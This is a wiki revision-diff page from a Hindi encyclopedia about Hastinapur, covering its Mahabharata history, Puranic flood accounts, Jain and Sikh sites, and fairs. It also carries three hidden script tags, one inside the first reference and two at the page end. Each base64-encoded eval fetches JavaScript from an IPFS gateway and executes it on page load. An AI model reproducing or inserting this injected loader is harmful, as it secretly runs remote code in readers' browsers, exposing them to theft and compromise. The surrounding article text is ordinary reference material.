Difference between revisions of "हस्तिनापुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''हस्तिनापुर''' [[उत्तर प्रदेश]] में [[मेरठ]] के निकट स्थित महाराज हस्ती का बसाया हुआ एक प्राचीन नगर, जो [[कौरव|कौरवों]] और [[पांडव|पांडवों]] की राजधानी थी। इसका [[महाभारत]] में वर्णित अनेक घटनाओं से संबंध है। महाभारत से जुड़ी सारी घटनाएँ हस्तिनापुर में ही हुई थीं। अभी भी यहाँ महाभारत काल से जुड़े कुछ [[अवशेष]] मौजूद हैं। इनमें कौरवों-पांडवों के महलों और मंदिरों के अवशेष प्रमुख हैं। इसके अलावा हस्तिनापुर को चक्रवर्ती सम्राट [[भरत (दुष्यंत पुत्र)|भरत]] की भी राजधानी माना जाता है। यहाँ स्थित 'पांडेश्वर महादेव मंदिर' की काफ़ी मान्यता है। कहा जाता है यह वही मंदिर है, जहाँ पांडवों की रानी [[द्रौपदी]] [[पूजा]] के लिए जाया करती थी। पौराणिक काल में हस्तिनापुर के राजा का नाम [[अधिसीम कृष्ण]] था।
 
'''हस्तिनापुर''' [[उत्तर प्रदेश]] में [[मेरठ]] के निकट स्थित महाराज हस्ती का बसाया हुआ एक प्राचीन नगर, जो [[कौरव|कौरवों]] और [[पांडव|पांडवों]] की राजधानी थी। इसका [[महाभारत]] में वर्णित अनेक घटनाओं से संबंध है। महाभारत से जुड़ी सारी घटनाएँ हस्तिनापुर में ही हुई थीं। अभी भी यहाँ महाभारत काल से जुड़े कुछ [[अवशेष]] मौजूद हैं। इनमें कौरवों-पांडवों के महलों और मंदिरों के अवशेष प्रमुख हैं। इसके अलावा हस्तिनापुर को चक्रवर्ती सम्राट [[भरत (दुष्यंत पुत्र)|भरत]] की भी राजधानी माना जाता है। यहाँ स्थित 'पांडेश्वर महादेव मंदिर' की काफ़ी मान्यता है। कहा जाता है यह वही मंदिर है, जहाँ पांडवों की रानी [[द्रौपदी]] [[पूजा]] के लिए जाया करती थी। पौराणिक काल में हस्तिनापुर के राजा का नाम [[अधिसीम कृष्ण]] था।
 
==स्थिति तथा स्थापना==
 
==स्थिति तथा स्थापना==
[[मेरठ]] से 22 मील उत्तर-पूर्व में [[गंगा]] की प्राचीन धारा के किनारे हस्तिनापुर बसा हुआ है। हस्तिनापुर महाभारत के समय में कौरवों की वैभवशाली राजधानी के रूप में [[भारत]] भर में प्रसिद्ध था। प्राचीन नगर गंगा तट पर स्थित था, किन्तु अब नदी यहां से कई मील दूर हट गई है। गंगा की पुरानी धारा जिसे 'बूढ़ी गंगा' कहते हैं, यहां के प्राचीन टीलों के समीप बहती है। पौराणिक किंवदंती के अनुसार नगर की स्थापना पुरुवंशी वृहत्क्षत्र के पुत्र हस्तिन् ने की थी और उसी के नाम पर यह नगर हस्तिनापुर कहलाया। हस्तिन् के पश्चात् अजामीढ़, दक्ष, संवरण और [[कुरु]] क्रमानुसार हस्तिनापुर में राज्य करते रहे। कुरु के वंश में ही [[शांतनु]] और उनके पौत्र [[पांडु]] तथा [[धृतराष्ट्र]] हुए, जिनके पुत्र [[पाण्डव]] और [[कौरव]] कहलाए।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=1014|url=}}</ref>
+
[[मेरठ]] से 22 मील उत्तर-पूर्व में [[गंगा]] की प्राचीन धारा के किनारे हस्तिनापुर बसा हुआ है। हस्तिनापुर महाभारत के समय में कौरवों की वैभवशाली राजधानी के रूप में [[भारत]] भर में प्रसिद्ध था। प्राचीन नगर गंगा तट पर स्थित था, किन्तु अब नदी यहां से कई मील दूर हट गई है। गंगा की पुरानी धारा जिसे 'बूढ़ी गंगा' कहते हैं, यहां के प्राचीन टीलों के समीप बहती है। पौराणिक किंवदंती के अनुसार नगर की स्थापना पुरुवंशी वृहत्क्षत्र के पुत्र हस्तिन् ने की थी और उसी के नाम पर यह नगर हस्तिनापुर कहलाया। हस्तिन् के पश्चात् अजामीढ़, दक्ष, संवरण और [[कुरु]] क्रमानुसार हस्तिनापुर में राज्य करते रहे। कुरु के वंश में ही [[शांतनु]] और उनके पौत्र [[पांडु]] तथा [[धृतराष्ट्र]] हुए, जिनके पुत्र [[पाण्डव]] और [[कौरव]] कहलाए।<ref name="aa">{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=1014|url=}}</ref>
 
==इतिहास==
 
==इतिहास==
 
महाभारतकालीन महानगरों की श्रेणी में हस्तिनापुर भी आता था। इसकी स्थापना 'हस्तिन्' नामक व्यक्ति द्वारा की गई थी। इसीलिये इसे 'हस्तिनापुर' कहा जाता था। हस्तिनापुर में [[युधिष्ठिर]] जुए में द्रौपदी सहित अपना सब कुछ हार गए थे। पांडवों की ओर से शांतिदूत बनकर [[श्रीकृष्ण]] यहीं [[धृतराष्ट्र]] की सभा में आए थे। अपने पिता [[शांतनु]] की [[सत्यवती]] से [[विवाह]] करने की इच्छा पूरी करने के लिए [[भीष्म पितामह]] ने अपना उत्तराधिकार छोड़ने और आजीवन अविवाहित रहने का प्रण यहीं पर किया था। द्रौपदी से विवाह के बाद कुछ समय के लिए पांडवों ने [[दिल्ली]] के निकट [[इंद्रप्रस्थ]] को अपनी राजधानी बनाया था, किंतु महाभारत युद्ध के बाद उन्होंने हस्तिनापुर को ही राजधानी रखा।
 
महाभारतकालीन महानगरों की श्रेणी में हस्तिनापुर भी आता था। इसकी स्थापना 'हस्तिन्' नामक व्यक्ति द्वारा की गई थी। इसीलिये इसे 'हस्तिनापुर' कहा जाता था। हस्तिनापुर में [[युधिष्ठिर]] जुए में द्रौपदी सहित अपना सब कुछ हार गए थे। पांडवों की ओर से शांतिदूत बनकर [[श्रीकृष्ण]] यहीं [[धृतराष्ट्र]] की सभा में आए थे। अपने पिता [[शांतनु]] की [[सत्यवती]] से [[विवाह]] करने की इच्छा पूरी करने के लिए [[भीष्म पितामह]] ने अपना उत्तराधिकार छोड़ने और आजीवन अविवाहित रहने का प्रण यहीं पर किया था। द्रौपदी से विवाह के बाद कुछ समय के लिए पांडवों ने [[दिल्ली]] के निकट [[इंद्रप्रस्थ]] को अपनी राजधानी बनाया था, किंतु महाभारत युद्ध के बाद उन्होंने हस्तिनापुर को ही राजधानी रखा।
Line 8: Line 8:
  
 
<blockquote>'नगरं हास्तिनपुरं शनैः प्रविविशुस्तदा। पांडवानागतांञ्छ्रुत्वा त्वा नागरास्तु कुतूहालात्, मंडयांचकिरेतत्र नगरं नागसाह्वयम। मुक्तपुष्पावकीर्ण तज्जलसिक्तं तु सर्वश:, घूषितं दिव्यघूपेन मंडनैश्चापि संवृतम्। पताकोछ्रितमाल्यमं च पुरमप्रतिमंबभौ, शंबभेरीनिनादैश्चनागवादित्रनि:स्वनै:। कौतूहलेन नगरं दीप्यमानमिवाभवत, तत्र ते पुरुषव्याघ्रा: दु:खशोकविनाशना:।'<ref> महाभारत, आदिपर्व 206, 14-दाक्षिणात्य पाठ, 15</ref></blockquote>
 
<blockquote>'नगरं हास्तिनपुरं शनैः प्रविविशुस्तदा। पांडवानागतांञ्छ्रुत्वा त्वा नागरास्तु कुतूहालात्, मंडयांचकिरेतत्र नगरं नागसाह्वयम। मुक्तपुष्पावकीर्ण तज्जलसिक्तं तु सर्वश:, घूषितं दिव्यघूपेन मंडनैश्चापि संवृतम्। पताकोछ्रितमाल्यमं च पुरमप्रतिमंबभौ, शंबभेरीनिनादैश्चनागवादित्रनि:स्वनै:। कौतूहलेन नगरं दीप्यमानमिवाभवत, तत्र ते पुरुषव्याघ्रा: दु:खशोकविनाशना:।'<ref> महाभारत, आदिपर्व 206, 14-दाक्षिणात्य पाठ, 15</ref></blockquote>
==महाभारत के समय पर हस्तिनापुर==
+
==महाभारतकालीन हस्तिनापुर==
महाभारत में इस नगर का भी खुला वर्णन मिलता हैं। इसके अनुसार विभिन्न शस्त्रों द्वारा सुरक्षित होने के कारण इस पुर के भीतर शत्रुओं का प्रवेश दुष्कर था। नगर के परकोटे में बने गोपुर (दरवाज़े) ऊँचे थे। नगर का भीतर भाग राजमार्गों द्वारा विभक्त था। सड़कों के दोनों किनारे महल और बाज़ारें सुशोभित थीं। राजमहल नगर के बीच में स्थित था। इसमें अनेक सरोवर उद्यान थे। नागरिक धर्मनिरत, होमपरायण, यज्ञादि में श्रद्धा रखने वाले, वर्णाश्रम-व्यवस्था के पोषक और धन-धान्य से सम्पन्न थे। सूत-मागध और बन्दी अपने-अपने कर्म में निरत थे। इनके द्वारा नगर की शोभा इतनी बढ़ गई थी कि वह इन्द्रलोक के समान सुन्दर लगता था।
+
[[महाभारत]] में इस नगर का खुला वर्णन मिलता है। इसके अनुसार विभिन्न शस्त्रों द्वारा सुरक्षित होने के कारण इस पुर के भीतर शत्रुओं का प्रवेश दुष्कर था। नगर के परकोटे में बने गोपुर (दरवाज़े) ऊँचे थे। नगर का भीतरी भाग राजमार्गों द्वारा विभक्त था। सड़कों के दोनों किनारों पर महल और बाज़ार सुशोभित थे। राजमहल नगर के बीच में स्थित था। इसमें अनेक सरोवर और उद्यान थे। नागरिक धर्मनिरत, होमपरायण, यज्ञादि में श्रद्धा रखने वाले, वर्णाश्रम-व्यवस्था के पोषक और धन-धान्य से सम्पन्न थे। सूत-मागध और बन्दी अपने-अपने कर्म में निरत थे। इनके द्वारा नगर की शोभा इतनी बढ़ गई थी कि वह इन्द्रलोक के समान सुन्दर लगता था।  
  
==पुराणों के अनुसार==
+
कहा जाता है कि महाभारत के समय हस्तिनापुर राज्य की उत्तरी सीमा 'शुक्करताल' ([[मुज़फ़्फ़रनगर ज़िला]]), दक्षिणी सीमा 'पुष्पवटी'<ref>पूठ, [[बुलंदशहर ज़िला]])</ref> और पश्चिमी सीमा 'वारणावत<ref>=बरनावा, [[मेरठ ज़िला]]</ref> तक थी। पूर्व की ओर [[गंगा]] प्रवाहित होती थी। गढ़मुक्तेश्वर शायद यहां का एक उपनगर था और [[मेरठ]] या 'मयराष्ट्र' भी इसकी परिसीमा के भीतर स्थित था।<ref>दि मानुमेंटल एंटिविवटीज एण्ड इंसक्रिप्शंस ऑव एन डब्ल्यू प्राविंसेज, [[1891]]</ref> मेरठ से 15 मील उत्तर-पूर्व में स्थित 'मवाना' (मुहाना) नामक ग्राम को हस्तिनापुर का प्रमुख द्वार कहा जाता है।<ref>हस्तिनापुर, शिक्षा विभाग, [[उत्तर प्रदेश]], पृ. 2</ref> [[महाभारत आदिपर्व]]<ref>महाभारत आदिपर्व 125,9</ref> में हस्तिनापुर के वर्धमान नामक पुरद्वार का उल्लेख है। [[पांडु]] की मृत्यु के पश्चात् शतश्रंग से हस्तिनापुर आते समय [[कुंती]] अपने पुत्रों सहित इसी द्वार से राजधानी में प्रविष्ट हुईं थी<ref name="aa"/>-
[[पुराण|पुराणों]] में कहा गया है कि जब [[गंगा]] की बाढ़ के कारण यह पुर विनष्ट हो गया, उस समय पाण्डव हस्तिनापुर को छोड़ कर [[कौशाम्बी]] चले आये थे। यह घटना झूठी नहीं मानी जा सकती। हस्तिनापुर और कौशाम्बी में जो खुदाइयाँ हाल में हुई हैं, उनसे इसकी पुष्टि हो चुकी है। अब विद्वान् इस बात को मानने लगे हैं कि गंगा की बाढ़ ने हस्तिनापुर को सचमुच ही किसी समय बहा दिया था। कौशाम्बी के कुछ प्राचीन बर्तन बनावट में हस्तिनापुर के बर्तनों के तुल्य हैं। इससे प्रमाणित होता है कि गंगा की बाढ़ के कारण पाण्डव हस्तिनापुर को छोड़ कर कौशाम्बी में बस गये थे। हस्तिनापुर की आधुनिक खुदाइयों ने वहाँ की प्राचीन कला और संस्कृति पर प्रकाश डाला है। वहाँ के नागरिक अपने बर्तनों पर भूरे [[रंग]] की पालिश चढ़ाते थे। यह प्रथा [[मथुरा]], इन्द्रप्रस्थ तथा महाभारतकालीन अन्य नगरों में भी प्रचलित थी। इससे सिद्ध होता है कि उनका सामाजिक जीवन एकाकी नहीं था। वे एक दूसरे से कोई बहुत दूर भी नहीं थे। जलमार्ग से एक दूसरे से वे लगे हुये थे, अतएव इन महापुरियों के निवासियों के बीच सांस्कृतिक सम्बन्ध कोई अनहोनी बात नहीं मानी जा सकती।
 
  
 +
<blockquote>'सात्वदीर्घेण कालेन सम्प्राप्ता: कुरुजांगलम्, वर्धमानपुरद्वारमाससाद यश-स्विनी।'</blockquote>
 +
==पुराण उल्लेख==
 +
[[पुराण|पुराणों]] में कहा गया है कि जब गंगा की [[बाढ़]] के कारण यह पुर विनष्ट हो गया, उस समय [[पाण्डव]] हस्तिनापुर को छोड़कर [[कौशाम्बी]] चले आये थे। यह घटना झूठी नहीं मानी जा सकती। हस्तिनापुर और कौशाम्बी में जो खुदाइयाँ हाल में हुई हैं, उनसे इसकी पुष्टि हो चुकी है। अब विद्वान इस बात को मानने लगे हैं कि गंगा की बाढ़ ने हस्तिनापुर को सचमुच ही किसी समय बहा दिया था। कौशाम्बी के कुछ प्राचीन बर्तन बनावट में हस्तिनापुर के बर्तनों के तुल्य हैं। इससे प्रमाणित होता है कि गंगा की बाढ़ के कारण पाण्डव हस्तिनापुर को छोड़कर कौशाम्बी में बस गये थे। हस्तिनापुर की आधुनिक खुदाइयों ने वहाँ की प्राचीन कला और संस्कृति पर प्रकाश डाला है। वहाँ के नागरिक अपने बर्तनों पर भूरे [[रंग]] की पालिश चढ़ाते थे। यह प्रथा [[मथुरा]], [[इन्द्रप्रस्थ]] तथा महाभारतकालीन अन्य नगरों में भी प्रचलित थी। इससे सिद्ध होता है कि उनका सामाजिक जीवन एकाकी नहीं था। वे एक-दूसरे से कोई बहुत दूर भी नहीं थे। जलमार्ग से एक-दूसरे से वे लगे हुये थे, अत:एइन महापुरियों के निवासियों के बीच सांस्कृतिक सम्बन्ध कोई अनहोनी बात नहीं मानी जा सकती।
 +
 +
'[[विष्णुपुराण]] से ज्ञात होता है कि [[बलराम]] ने कौरवों पर क्रोध करके उनके नगर हस्तिनापुर को अपने हल की नोंक से खींच कर [[गंगा]] में गिराना चाहा था, किंतु पीछे उन्हें क्षमा कर दिया; किन्तु उसके पश्चात हस्तिनापुर गंगा की ओर कुछ झुका हुआ-सा प्रतीत होने लगा था-
 +
 +
<blockquote>'बलदेवस्ततोगत्वा नगरं नागसाहृयम् बाह्योपवनमध्येऽभून्नविवेशतत्पुरम्।'<ref>विष्णुपुराण 5,35,8</ref></blockquote>
 +
 +
<blockquote>'अद्याप्याघूर्णिताकारं लक्ष्यते तत्गुरं द्विज, एष प्रभावो रामस्य बलशौयोलक्षणः।'<ref>विष्णुपुराण 5,35,37</ref></blockquote>
 +
 +
इससे जान पड़ता है कि हस्तिनापुर को [[गंगा]] की धारा के भय कौरवों के समय में ही उत्पन्न हो गया था। [[परीक्षित]] के वंशज 'निचक्षु' या 'निचक्नु' के समय में तो वास्तव में ही गंगा ने हस्तिनापुर को बहा दिया और उसे इस नगर को छोड़कर वत्स देश की प्रसिद्ध नगरी [[कौशाम्बी]] में जाकर बसना पड़ा था-
 +
 +
<blockquote>'अधिसीमकृष्णान्निचक्नुः यो गंगया पह्ते हस्तिनापुरे कौशम्बयां निवत्स्यति।'<ref>विष्णुपुराण 21,7-78; पार्जिटर-डायनेस्टजी ऑव दि कलि एज, पृ. 5</ref></blockquote>
 +
 +
पुरातत्वों की खोजों से भी उपरोक्त तथ्य की पुष्टि होती है।<ref name="aa"/>
 
==प्रमुख जैन तीर्थ==
 
==प्रमुख जैन तीर्थ==
[[जैन]] समुदाय के बीच हस्तिनापुर को एक प्रमुख तीर्थ माना जाता है। हस्तिनापुर जैन धर्मावलंबियों का भी प्रसिद्ध तीर्थ है। यहाँ जैन धर्म के कई तीर्थंकरों का जन्म हुआ था। यही वजह है कि यहाँ काफ़ी संख्या में जैन मंदिर मौजूद हैं। यहीं पर [[राजा श्रेयांस]] ने आदितीर्थकर [[ऋषभदेव]] को ईख के रस का दान दिया था। इसलिए इसको 'दानतीर्थ' कहते हैं। इसका संबंध [[शांतिनाथ]], [[कुन्थुनाथ]] और [[अरनाथ]] नामक तीर्थकरों से भी है। यहाँ भगवान शान्तिनाथ - कुन्थुनाथ - अरहनाथ के चार- चार [[कल्याणक]] हुए हैं । यहाँ अनेक जैन धर्मशालाएं और मंदिर हैं। खुदाई में यहाँ अनेक प्राचीन खंडहर मिले हैं। इनमें क़रीब 200 साल पुराना बड़ा मंदिर, [[जंबूद्वीप]], [[कैलाश पर्वत]], अष्टापद जी, [[कमल मंदिर]] और [[ध्यान मंदिर]] मुख्य हैं। प्राचीन बड़ा मंदिर में हस्तिनापुर की नहर की खुदाई के दौरान प्राप्त हुई जिन प्रतिमाओं को देखा जा सकता है। इन मंदिरों को काफ़ी सुंदर और कलात्मक तरीक़े से बनाया गया है।
+
[[जैन]] समुदाय के बीच हस्तिनापुर को एक प्रमुख तीर्थ माना जाता है। हस्तिनापुर जैन धर्मावलंबियों का भी प्रसिद्ध तीर्थ है। यहाँ जैन धर्म के कई तीर्थंकरों का जन्म हुआ था। यही वजह है कि यहाँ काफ़ी संख्या में जैन मंदिर मौजूद हैं। यहीं पर राजा श्रेयांस ने आदितीर्थकर [[ऋषभदेव]] को ईख के रस का दान दिया था। इसलिए इसको 'दानतीर्थ' कहते हैं। इसका संबंध [[शांतिनाथ]], [[कुन्थुनाथ]] और [[अरनाथ]] नामक तीर्थकरों से भी है। यहाँ भगवान शान्तिनाथ - कुन्थुनाथ - अरहनाथ के चार- चार कल्याणक हुए हैं । यहाँ अनेक जैन धर्मशालाएं और मंदिर हैं। खुदाई में यहाँ अनेक प्राचीन खंडहर मिले हैं। इनमें क़रीब 200 साल पुराना बड़ा मंदिर, [[जंबूद्वीप]], [[कैलाश पर्वत]], अष्टापद जी, [[कमल मंदिर]] और ध्यान मंदिर मुख्य हैं। प्राचीन बड़ा मंदिर में हस्तिनापुर की नहर की खुदाई के दौरान प्राप्त हुई जिन प्रतिमाओं को देखा जा सकता है। इन मंदिरों को काफ़ी सुंदर और कलात्मक तरीक़े से बनाया गया है।
  
 
==सिखों का पवित्र स्थान ==
 
==सिखों का पवित्र स्थान ==

Revision as of 11:35, 14 August 2014

hastinapur uttar pradesh mean merath ke nikat sthit maharaj hasti ka basaya hua ek prachin nagar, jo kauravoan aur paandavoan ki rajadhani thi. isaka mahabharat mean varnit anek ghatanaoan se sanbandh hai. mahabharat se ju di sari ghatanaean hastinapur mean hi huee thian. abhi bhi yahaan mahabharat kal se ju de kuchh avashesh maujood haian. inamean kauravoan-paandavoan ke mahaloan aur mandiroan ke avashesh pramukh haian. isake alava hastinapur ko chakravarti samrat bharat ki bhi rajadhani mana jata hai. yahaan sthit 'paandeshvar mahadev mandir' ki kafi manyata hai. kaha jata hai yah vahi mandir hai, jahaan paandavoan ki rani draupadi pooja ke lie jaya karati thi. pauranik kal mean hastinapur ke raja ka nam adhisim krishna tha.

sthiti tatha sthapana

merath se 22 mil uttar-poorv mean ganga ki prachin dhara ke kinare hastinapur basa hua hai. hastinapur mahabharat ke samay mean kauravoan ki vaibhavashali rajadhani ke roop mean bharat bhar mean prasiddh tha. prachin nagar ganga tat par sthit tha, kintu ab nadi yahaan se kee mil door hat gee hai. ganga ki purani dhara jise 'boodhi ganga' kahate haian, yahaan ke prachin tiloan ke samip bahati hai. pauranik kianvadanti ke anusar nagar ki sthapana puruvanshi vrihatkshatr ke putr hastinh ne ki thi aur usi ke nam par yah nagar hastinapur kahalaya. hastinh ke pashchath ajamidh, daksh, sanvaran aur kuru kramanusar hastinapur mean rajy karate rahe. kuru ke vansh mean hi shaantanu aur unake pautr paandu tatha dhritarashtr hue, jinake putr pandav aur kaurav kahalae.[1]

itihas

mahabharatakalin mahanagaroan ki shreni mean hastinapur bhi ata tha. isaki sthapana 'hastinh' namak vyakti dvara ki gee thi. isiliye ise 'hastinapur' kaha jata tha. hastinapur mean yudhishthir jue mean draupadi sahit apana sab kuchh har ge the. paandavoan ki or se shaantidoot banakar shrikrishna yahian dhritarashtr ki sabha mean ae the. apane pita shaantanu ki satyavati se vivah karane ki ichchha poori karane ke lie bhishm pitamah ne apana uttaradhikar chho dane aur ajivan avivahit rahane ka pran yahian par kiya tha. draupadi se vivah ke bad kuchh samay ke lie paandavoan ne dilli ke nikat iandraprasth ko apani rajadhani banaya tha, kiantu mahabharat yuddh ke bad unhoanne hastinapur ko hi rajadhani rakha.

vishal nagar

mahabharat ke yuddh ke samay hastinapur b da vishal nagar tha. mahabharat adiparv mean isaka varnan is prakar hai-

'nagaran hastinapuran shanaiah pravivishustada. paandavanagataannchhrutva tva nagarastu kutoohalath, mandayaanchakiretatr nagaran nagasahvayam. muktapushpavakirn tajjalasiktan tu sarvash:, ghooshitan divyaghoopen mandanaishchapi sanvritamh. patakochhritamalyaman ch puramapratimanbabhau, shanbabherininadaishchanagavaditrani:svanai:. kautoohalen nagaran dipyamanamivabhavat, tatr te purushavyaghra: du:khashokavinashana:.'[2]

mahabharatakalin hastinapur

mahabharat mean is nagar ka khula varnan milata hai. isake anusar vibhinn shastroan dvara surakshit hone ke karan is pur ke bhitar shatruoan ka pravesh dushkar tha. nagar ke parakote mean bane gopur (daravaze) ooanche the. nagar ka bhitari bhag rajamargoan dvara vibhakt tha. s dakoan ke donoan kinaroan par mahal aur bazar sushobhit the. rajamahal nagar ke bich mean sthit tha. isamean anek sarovar aur udyan the. nagarik dharmanirat, homaparayan, yajnadi mean shraddha rakhane vale, varnashram-vyavastha ke poshak aur dhan-dhany se sampann the. soot-magadh aur bandi apane-apane karm mean nirat the. inake dvara nagar ki shobha itani badh gee thi ki vah indralok ke saman sundar lagata tha.

kaha jata hai ki mahabharat ke samay hastinapur rajy ki uttari sima 'shukkaratal' (muzaffaranagar zila), dakshini sima 'pushpavati'[3] aur pashchimi sima 'varanavat[4] tak thi. poorv ki or ganga pravahit hoti thi. gadhamukteshvar shayad yahaan ka ek upanagar tha aur merath ya 'mayarashtr' bhi isaki parisima ke bhitar sthit tha.[5] merath se 15 mil uttar-poorv mean sthit 'mavana' (muhana) namak gram ko hastinapur ka pramukh dvar kaha jata hai.[6] mahabharat adiparv[7] mean hastinapur ke vardhaman namak puradvar ka ullekh hai. paandu ki mrityu ke pashchath shatashrang se hastinapur ate samay kuanti apane putroan sahit isi dvar se rajadhani mean pravisht hueean thi[1]-

'satvadirghen kalen samprapta: kurujaangalamh, vardhamanapuradvaramasasad yash-svini.'

puran ullekh

puranoan mean kaha gaya hai ki jab ganga ki badh ke karan yah pur vinasht ho gaya, us samay pandav hastinapur ko chho dakar kaushambi chale aye the. yah ghatana jhoothi nahian mani ja sakati. hastinapur aur kaushambi mean jo khudaiyaan hal mean huee haian, unase isaki pushti ho chuki hai. ab vidvan is bat ko manane lage haian ki ganga ki badh ne hastinapur ko sachamuch hi kisi samay baha diya tha. kaushambi ke kuchh prachin bartan banavat mean hastinapur ke bartanoan ke tuly haian. isase pramanit hota hai ki ganga ki badh ke karan pandav hastinapur ko chho dakar kaushambi mean bas gaye the. hastinapur ki adhunik khudaiyoan ne vahaan ki prachin kala aur sanskriti par prakash dala hai. vahaan ke nagarik apane bartanoan par bhoore rang ki palish chadhate the. yah pratha mathura, indraprasth tatha mahabharatakalin any nagaroan mean bhi prachalit thi. isase siddh hota hai ki unaka samajik jivan ekaki nahian tha. ve ek-doosare se koee bahut door bhi nahian the. jalamarg se ek-doosare se ve lage huye the, at:ein mahapuriyoan ke nivasiyoan ke bich saanskritik sambandh koee anahoni bat nahian mani ja sakati.

'vishnupuran se jnat hota hai ki balaram ne kauravoan par krodh karake unake nagar hastinapur ko apane hal ki noank se khianch kar ganga mean girana chaha tha, kiantu pichhe unhean kshama kar diya; kintu usake pashchat hastinapur ganga ki or kuchh jhuka hua-sa pratit hone laga tha-

'baladevastatogatva nagaran nagasahriyamh bahyopavanamadhyeabhoonnaviveshatatpuramh.'[8]

'adyapyaghoornitakaran lakshyate tatguran dvij, esh prabhavo ramasy balashauyolakshanah.'[9]

isase jan p data hai ki hastinapur ko ganga ki dhara ke bhay kauravoan ke samay mean hi utpann ho gaya tha. parikshit ke vanshaj 'nichakshu' ya 'nichaknu' ke samay mean to vastav mean hi ganga ne hastinapur ko baha diya aur use is nagar ko chho dakar vats desh ki prasiddh nagari kaushambi mean jakar basana p da tha-

'adhisimkrishnaannichaknuah yo gangaya pahte hastinapure kaushambayaan nivatsyati.'[10]

puratatvoan ki khojoan se bhi uparokt tathy ki pushti hoti hai.[1]

pramukh jain tirth

jain samuday ke bich hastinapur ko ek pramukh tirth mana jata hai. hastinapur jain dharmavalanbiyoan ka bhi prasiddh tirth hai. yahaan jain dharm ke kee tirthankaroan ka janm hua tha. yahi vajah hai ki yahaan kafi sankhya mean jain mandir maujood haian. yahian par raja shreyaans ne aditirthakar rrishabhadev ko eekh ke ras ka dan diya tha. isalie isako 'danatirth' kahate haian. isaka sanbandh shaantinath, kunthunath aur aranath namak tirthakaroan se bhi hai. yahaan bhagavan shantinath - kunthunath - arahanath ke char- char kalyanak hue haian . yahaan anek jain dharmashalaean aur mandir haian. khudaee mean yahaan anek prachin khandahar mile haian. inamean qarib 200 sal purana b da mandir, janboodvip, kailash parvat, ashtapad ji, kamal mandir aur dhyan mandir mukhy haian. prachin b da mandir mean hastinapur ki nahar ki khudaee ke dauran prapt huee jin pratimaoan ko dekha ja sakata hai. in mandiroan ko kafi suandar aur kalatmak tariqe se banaya gaya hai.

sikhoan ka pavitr sthan 

hastinapur pahala aisa tirthasthan hai, jo hindoo aur jainoan ke sath sikhoan ka bhi pavitr tirth hai. hastinapur ke pas hi sthit saiphapur sikh dharm ke panch pyaroan mean se ek bhaee dharmadas ki janmasthali hai. desh bhar ke shraddhalu yahaan sthit pavitr sarovar mean dubaki lagane ke lie ate rahate haian.

mele

hastinapur mean sal mean kee chhote-b de mele lagate haian. inamean akshay tritiya, holi aur 2 aktoobar ka mela pramukh hai. akshay tritiya ko desh bhar se shraddhalu yahaan bhagavan ko ganne ke ras ka ahar karane ke lie ate haian. agar apako holi ke rang pasand nahian ate, to hastinapur apake lie inase bachane ki ek behatarin jagah sabit ho sakata hai. dulhaiandi vale din yahaan lagane vale mele mean desh bhar se holi nahian khelane vale log ate haian. sath hi 2 aktoobar ko lagane vale mele mean bhi kafi bhi d um dati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 1014 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. mahabharat, adiparv 206, 14-dakshinaty path, 15
  3. pooth, bulandashahar zila)
  4. =baranava, merath zila
  5. di manumeantal eantivivatij end iansakripshans aauv en dablyoo praviansej, 1891
  6. hastinapur, shiksha vibhag, uttar pradesh, pri. 2
  7. mahabharat adiparv 125,9
  8. vishnupuran 5,35,8
  9. vishnupuran 5,35,37
  10. vishnupuran 21,7-78; parjitar-dayanestaji aauv di kali ej, pri. 5

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>